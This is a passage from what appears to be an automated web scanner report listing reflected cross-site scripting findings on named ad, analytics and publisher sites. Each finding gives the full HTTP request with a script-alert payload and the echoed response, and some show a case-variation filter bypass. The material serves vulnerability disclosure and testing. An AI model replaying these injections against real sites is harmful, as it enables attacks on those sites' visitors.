.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"8b174<script>alert(1)</script>253c92feb83", c16:"", r:""});


4.118. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload bb21d<script>alert(1)</script>a519cc9619e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156bb21d<script>alert(1)</script>a519cc9619e&c3=5839988&c4=43836708&c5=70721135&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:34:58 GMT
Date: Sat, 17 Sep 2011 16:34:58 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036156bb21d<script>alert(1)</script>a519cc9619e", c3:"5839988", c4:"43836708", c5:"70721135", c6:"", c10:"", c15:"", c16:"", r:""});


4.119. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 98bb8<script>alert(1)</script>512a5964b9b was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=583998898bb8<script>alert(1)</script>512a5964b9b&c4=43836708&c5=70721135&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:34:59 GMT
Date: Sat, 17 Sep 2011 16:34:59 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036156", c3:"583998898bb8<script>alert(1)</script>512a5964b9b", c4:"43836708", c5:"70721135", c6:"", c10:"", c15:"", c16:"", r:""});


4.120. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload fcab9<script>alert(1)</script>d7ac84b85c6 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=5839988&c4=43836708fcab9<script>alert(1)</script>d7ac84b85c6&c5=70721135&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:35:01 GMT
Date: Sat, 17 Sep 2011 16:35:01 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708fcab9<script>alert(1)</script>d7ac84b85c6", c5:"70721135", c6:"", c10:"", c15:"", c16:"", r:""});


4.121. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ad03d<script>alert(1)</script>3c8aa488771 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=5839988&c4=43836708&c5=70721135ad03d<script>alert(1)</script>3c8aa488771&c6=& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:35:02 GMT
Date: Sat, 17 Sep 2011 16:35:02 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708", c5:"70721135ad03d<script>alert(1)</script>3c8aa488771", c6:"", c10:"", c15:"", c16:"", r:""});


4.122. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9597a<script>alert(1)</script>f4456cf9540 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6036156&c3=5839988&c4=43836708&c5=70721135&c6=9597a<script>alert(1)</script>f4456cf9540& HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 16:35:03 GMT
Date: Sat, 17 Sep 2011 16:35:03 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"6036156", c3:"5839988", c4:"43836708", c5:"70721135", c6:"9597a<script>alert(1)</script>f4456cf9540", c10:"", c15:"", c16:"", r:""});


4.123. http://c.aol.com/read/_topic_stats [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.aol.com
Path:   /read/_topic_stats

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 522e9<script>alert(1)</script>70e589ec740 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /read/_topic_stats?ids=&links=http%3A%2F%2Fnai.glb.adtechus.com%2Fnai%2Fdaa.php7f0ce%2522-alert(document.location)-%2522a235be901d&blog_id=&dirty=true&callback=jsonp1316296586533522e9<script>alert(1)</script>70e589ec740 HTTP/1.1
Host: c.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:37:26 GMT
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Set-Cookie: gcp.dirty=true; Expires=Sat, 17-Sep-2011 17:42:26 GMT; Path=/
Content-Length: 203

jsonp1316296586533522e9<script>alert(1)</script>70e589ec740({
"status" : "OK",
"http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d" : {
"comments" : -1
}
});
4.124. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 3519d<script>alert(1)</script>6de3af1e98f was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90&c=adconion01cont33519d<script>alert(1)</script>6de3af1e98f&w=728&h=90&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:40:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5492
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
ivName:"te-clr1-04c957cd-4db2-4ed6-9fbb-2fb88dc3baa8-itl",iconSpanId:"te-clr1-04c957cd-4db2-4ed6-9fbb-2fb88dc3baa8-icon",backgroundColor:"white",opacity:1,filterOpacity:100,containerId:"adconion01cont33519d<script>alert(1)</script>6de3af1e98f",noticeBaseUrl:"http://choices-elb.truste.com/camsg?",irBaseUrl:"http://choices-elb.truste.com/cair?",interstitial:te_clr1_04c957cd_4db2_4ed6_9fbb_2fb88dc3baa8_ib,interstitialWidth:480,interstitialHei
...[SNIP]...
4.125. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload dfc65<ScRiPt>alert(1)</ScRiPt>d40047a097a was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90dfc65<ScRiPt>alert(1)</ScRiPt>d40047a097a&c=adconion01cont3&w=728&h=90&plc=tr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:39:54 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5574
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<a style="color:#456d88;text-decoration:none; display:inline; padding: 0; margin: 0;" href="http://preferences.truste.com/preference.html?affiliateId=40&pid=adexpose01&aid=adconion01&cid=0511adc728x90dfc65<ScRiPt>alert(1)</ScRiPt>d40047a097a&w=728&h=90" target="_blank">
...[SNIP]...
4.126. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload ecb25<ScRiPt>alert(1)</ScRiPt>a9de9a016c1 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=adexpose01&aid=adconion01&cid=0511adc728x90&c=adconion01cont3&w=728&h=90&plc=trecb25<ScRiPt>alert(1)</ScRiPt>a9de9a016c1 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/303/hearst_us/728x90/misquincemag_us?t=1316294776909&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.misquincemag.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 16:41:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 5492
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
_clr1_960d0403_4ed5_48db_a460_bf6870783bbf_bi={baseName:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf",anchName:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf-anch",width:728,height:90,ox:0,oy:0,plc:"trecb25<ScRiPt>alert(1)</ScRiPt>a9de9a016c1",iplc:"rel",intDivName:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf-itl",iconSpanId:"te-clr1-960d0403-4ed5-48db-a460-bf6870783bbf-icon",backgroundColor:"white",opacity:1,filterOpacity:100,containerId
...[SNIP]...
4.127. http://cm.npc-hearst.overture.com/js_1_0/ [css_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cm.npc-hearst.overture.com
Path:   /js_1_0/

Issue detail

The value of the css_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f37b9"><script>alert(1)</script>c19849ec573 was submitted in the css_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js_1_0/?config=2130893885&type=home_page&ctxtId=home_page&keywordCharEnc=utf8&source=npc_hearst_stamfordadvocate_t2_ctxt&adwd=171&adht=630&ctxtUrl=http%3A%2F%2Fwww.stamfordadvocate.com%2F&css_url=http://www.stamfordadvocate.com/css/hdn/modules/ads/ysm.cssf37b9"><script>alert(1)</script>c19849ec573&refUrl=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fthe-advocate.php&du=1&cb=1316294655906&ctxtContent=%3Chead%3E%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%20async%3D%22%22%20src%3D%22http%3A%2F%2Fwww.google-analytics.com%2Fga.js%22%3E%3C%2Fscript%3E%3Cscript%3Evar%20HDN%20%3D%20HDN%20%7C%7C%20%7B%7D%3B%20HDN.t_firstbyte%20%3D%20Number(new%20Date())%3B%3C%2Fscript%3E%0A%09%09%3Cmeta%20http-equiv%3D%22content-type%22%20content%3D%22text%2Fhtml%3B%20charset%3Dutf-8%22%20name%3D%22noname%22%3E%0A%0A%09%09%3C!--%20generated%20at%202011-09-17%2011%3A18%3A09%20on%20prodWCM3%20running%20v2.5.6_p1.9644%20--%3E%0A%0A%09%09%3Cmeta%20name%3D%22adwiz-site%22%20content%3D%22sa%22%3E%0A%09%09%3Cmeta%20name%3D%22skype_toolbar%22%20content%3D%22SKYPE_TOOLBAR_PARSER_COMPATIBLE%22%3E%0A%0A%09%09%0A%09%09%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0A%09%09%09%2F%2F%20%3C HTTP/1.1
Host: cm.npc-hearst.overture.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDUyMnF0tnc1cAC6ZN1ww=

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:23:16 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDcyNjCzcjRwMAV8lMvAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Tue, 14-Sep-2021 16:23:16 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<link rel="stylesheet" href="http://www.stamfordadvocate.com/css/hdn/modules/ads/ysm.cssf37b9"><script>alert(1)</script>c19849ec573" type="text/css">
...[SNIP]...
4.128. http://ellegirl.elle.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1903</script><script>alert(1)</script>43727dda065 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?b1903</script><script>alert(1)</script>43727dda065=1 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Vary: Accept-Encoding
Content-Length: 66350
Content-Type: text/html; charset=UTF-8
Date: Sat, 17 Sep 2011 16:32:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
= '';
s.prop2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:hp';
s.prop7 = 'eg:hp';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/?b1903</script><script>alert(1)</script>43727dda065=1';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:hp';
s.evar7 = 'eg:hp';
s.evar8 = document.location.href;

/************* DO NOT ALTER ANYTHING BELOW T
...[SNIP]...
4.129. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ca0b</script><script>alert(1)</script>83bf923947f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content9ca0b</script><script>alert(1)</script>83bf923947f/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js?show_linkback=false&ver=1.4.9 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
X-Pingback: http://ellegirl.elle.com/xmlrpc.php
Last-Modified: Sat, 17 Sep 2011 16:33:12 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 30545
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Sat, 17 Sep 2011 16:33:16 GMT
Date: Sat, 17 Sep 2011 16:33:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
2 = '';
//s.prop3 = '';
s.prop3 = document.title;
s.prop4 = '';
s.prop5 = '';
s.prop6 = 'eg:misc';
s.prop7 = 'eg:misc';
s.prop8 = document.location.href;

s.evar1 = '';
s.evar2 = '/wp-content9ca0b</script><script>alert(1)</script>83bf923947f/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js?show_linkback=false&ver=1.4.9';
//s.evar3 = '';
s.evar3 = document.title;
s.evar4 = '';
s.evar5 = '';
s.evar6 = 'eg:misc';
...[SNIP]...
4.130. http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ellegirl.elle.com
Path:   /wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3febf</script><script>alert(1)</script>88390bc0032 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wp-content/plugins3febf</script><script>alert(1)</script>88390bc0032/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js?show_linkback=false&ver=1.4.9 HTTP/1.1
Host: ellegirl.elle.com
Proxy-Connection: keep-alive
